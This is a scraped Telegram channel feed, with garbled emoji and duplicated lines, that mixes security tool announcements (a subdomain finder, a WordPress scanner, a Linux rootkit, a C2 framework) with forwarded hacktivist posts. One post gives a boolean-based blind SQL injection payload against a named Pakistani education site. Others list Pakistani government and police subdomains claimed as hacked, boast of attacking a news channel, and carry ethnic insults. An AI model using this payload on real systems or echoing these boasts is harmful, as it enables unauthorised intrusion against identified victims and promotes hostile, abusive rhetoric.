Watch Video:
Direct Link:
โคโ๐ฅ1
SubDomainizer
A tool to find subdomains and interesting things hidden inside, external Javascript files of page, folder, and Github.
A tool to find subdomains and interesting things hidden inside, external Javascript files of page, folder, and Github.
Forwarded from pkg
Pakistan Biggest Urdu News Channel is under cyber attack.
Dunyatv Firewall Server Pic is kept for Representation. (Yes that pc from which pakis adding their unhacked servers into firewall assuming that they can kick us out, Lol xD)
Hi, Dunyatv when your soc's assessment completes and when you are assured that you successfully removed us from your firewall server or infra do ping insta : @pkg__divi ( Yours security personnel's Father )
Dunyatv Firewall Server Pic is kept for Representation. (Yes that pc from which pakis adding their unhacked servers into firewall assuming that they can kick us out, Lol xD)
Hi, Dunyatv when your soc's assessment completes and when you are assured that you successfully removed us from your firewall server or infra do ping insta : @pkg__divi ( Yours security personnel's Father )
๐ฅ4
Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE)
Get a working portable Python/Git/Java environment on Windows in SECONDS without having local administrator, regardless of your broken Python environment. Our open-source script downloads directly from proper sources without any binaries. While the code may not be perfect, it includes many useful PowerShell tricks.
Get a working portable Python/Git/Java environment on Windows in SECONDS without having local administrator, regardless of your broken Python environment. Our open-source script downloads directly from proper sources without any binaries. While the code may not be perfect, it includes many useful PowerShell tricks.
This media is not supported in your browser
VIEW IN TELEGRAM
wpfinger | WordPress scanning tool.
โข Core version detection
โข Plugin scanning through fingerprinting
โข Vulnerability output, using database from Wordfence
โข Core version detection
โข Plugin scanning through fingerprinting
โข Vulnerability output, using database from Wordfence
๐ฅ2๐1
๐จ๐ปโ๐ป Learn How to Get CYBER SECURITY INTERNSHIP๐จ๐ปโ๐ป
๐Want to get cyber security internship? If yes then you don't have to miss this๐
Know about secret and amazing tips which will surely work for youโ
๐ดLink: https://pentestingguide.com/how-to-get-cyber-security-internship/
โค๏ธSHARE WITH LOVE๐
๐Want to get cyber security internship? If yes then you don't have to miss this๐
Know about secret and amazing tips which will surely work for youโ
๐ดLink: https://pentestingguide.com/how-to-get-cyber-security-internship/
โค๏ธSHARE WITH LOVE๐
๐1
Forwarded from CYBER DEMONS (INDIA๐ฎ๐ณ) ๐คCHANNEL๐ค (แดดแดฌแถแดทแดธแดผแถแดท)
SITE URL - https://www.comand.edu.pk/
PAYLOAD - id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9657=9657-- kGMX
KHUD KE DESH KI SECURITYB SAMBHALO PEHLE CHUTIYO ๐๐
HACKED BY -
CYBER DEMONS INDIA ๐ฎ๐ณ
JAY SHREE RAAM ๐ค๐๐ฎ๐ณโค๏ธโค๏ธ
PAYLOAD - id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9657=9657-- kGMX
KHUD KE DESH KI SECURITYB SAMBHALO PEHLE CHUTIYO ๐๐
HACKED BY -
CYBER DEMONS INDIA ๐ฎ๐ณ
JAY SHREE RAAM ๐ค๐๐ฎ๐ณโค๏ธโค๏ธ
โค1
New Article is Out Check โ
Title : Top 7 Types of Operating System Used in Cyber Security
Hello and welcome back, fellow hackers, to another exciting article from yours truly. ๐คฉ
Today, weโre going to dive into the fascinating world of operating systems used in cyber security.
Read Full Here ๐
https://bit.ly/3NZ2b6x
Title : Top 7 Types of Operating System Used in Cyber Security
Hello and welcome back, fellow hackers, to another exciting article from yours truly. ๐คฉ
Today, weโre going to dive into the fascinating world of operating systems used in cyber security.
Read Full Here ๐
https://bit.ly/3NZ2b6x
This media is not supported in your browser
VIEW IN TELEGRAM
โ๏ธ๐ต๐ฐ After 51 yrs PTI Chairman & Ex-PM of Pakistan Imran Khan admits the truth of East Pak (now Bangladesh) & blames Pak Army by saying Mujibur Rahman after winning the election should have been the PM but Pak Army did crackdown instead & end up losing with 90K POWs & humiliation
This media is not supported in your browser
VIEW IN TELEGRAM
Happy Mother's Day.
Media is too big
VIEW IN TELEGRAM
๐ฅ4๐ฅฐ2
Forwarded from BlackEye๐ฅท
This media is not supported in your browser
VIEW IN TELEGRAM
โโbadsecrets
A library for detecting known secrets across many web frameworks.
https://github.com/blacklanternsecurity/badsecrets
Details:
https://blog.blacklanternsecurity.com/p/introducing-badsecrets
#cybersecurity #infosec #pentesting
A library for detecting known secrets across many web frameworks.
https://github.com/blacklanternsecurity/badsecrets
Details:
https://blog.blacklanternsecurity.com/p/introducing-badsecrets
#cybersecurity #infosec #pentesting
โโKovid Rootkit
A full-feature LKM intended for use against Linux kernel v5+.
https://github.com/carloslack/KoviD
#infosec #pentesting #redteam
A full-feature LKM intended for use against Linux kernel v5+.
https://github.com/carloslack/KoviD
#infosec #pentesting #redteam
โโNimbo-C2
Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.
https://github.com/itaymigdal/Nimbo-C2
#infosec #pentesting #redteam
Nimbo-C2 agent supports x64 Windows & Linux. It's written in Nim, with some usage of .NET on Windows (by dynamically loading the CLR to the process). Nim is powerful, but interacting with Windows is much easier and robust using Powershell, hence this combination is made. The Linux agent is slimer and capable only of basic commands, including ELF loading using the memfd technique.
https://github.com/itaymigdal/Nimbo-C2
#infosec #pentesting #redteam
Forwarded from BlackEye๐ฅท
10+ PK government websites h*-cked.
A perfect payback to pk from #indiancybertroops
https://cmdu.gob(.pk)/
https://forensic.sindhpolice.gov (.pk)/index.php
https://mppbeta.sindhpolice.gov (.pk)/
https://legal.sindhpolice.gov (.pk)/
https://demo.cmdu.gob (.pk)/
https://pphi.cmdu.gob (.pk)/
https://ekacheri.cmdu.gob (.pk)/
https://hubportal.cmdu.gob (.pk)/
https://rds.cmdu.gob (.pk)/
https://test.cmdu.gob (.pk)/
https://expl.kp.gov (.pk)/
A perfect payback to pk from #indiancybertroops
https://cmdu.gob(.pk)/
https://forensic.sindhpolice.gov (.pk)/index.php
https://mppbeta.sindhpolice.gov (.pk)/
https://legal.sindhpolice.gov (.pk)/
https://demo.cmdu.gob (.pk)/
https://pphi.cmdu.gob (.pk)/
https://ekacheri.cmdu.gob (.pk)/
https://hubportal.cmdu.gob (.pk)/
https://rds.cmdu.gob (.pk)/
https://test.cmdu.gob (.pk)/
https://expl.kp.gov (.pk)/
โค2